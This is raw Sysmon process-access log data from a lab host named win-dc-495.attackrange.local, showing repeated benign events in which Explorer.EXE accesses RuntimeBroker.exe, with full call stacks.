13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f65|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459 10341000x800000000000000013123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+106730|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a34f|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013118Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013117Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000013116Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700 10341000x800000000000000013115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+10a9a2|C:\Windows\System32\Windows.Storage.dll+10a32b|C:\Windows\System32\Windows.Storage.dll+10768d|C:\Windows\System32\Windows.Storage.dll+10847d|C:\Windows\System32\Windows.Storage.dll+1065fa|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1 10341000x800000000000000013114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.836{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+1095f4|C:\Windows\System32\Windows.Storage.dll+19ab5e|C:\Windows\System32\Windows.Storage.dll+107103|C:\Windows\System32\Windows.Storage.dll+106b30|C:\Windows\System32\Windows.Storage.dll+106572|C:\Windows\System32\Windows.Storage.dll+106365|C:\Windows\System32\Windows.Storage.dll+1067db|C:\Windows\System32\Windows.Storage.dll+1018ee|C:\Windows\System32\Windows.Storage.dll+1040e8|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72 10341000x800000000000000013112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
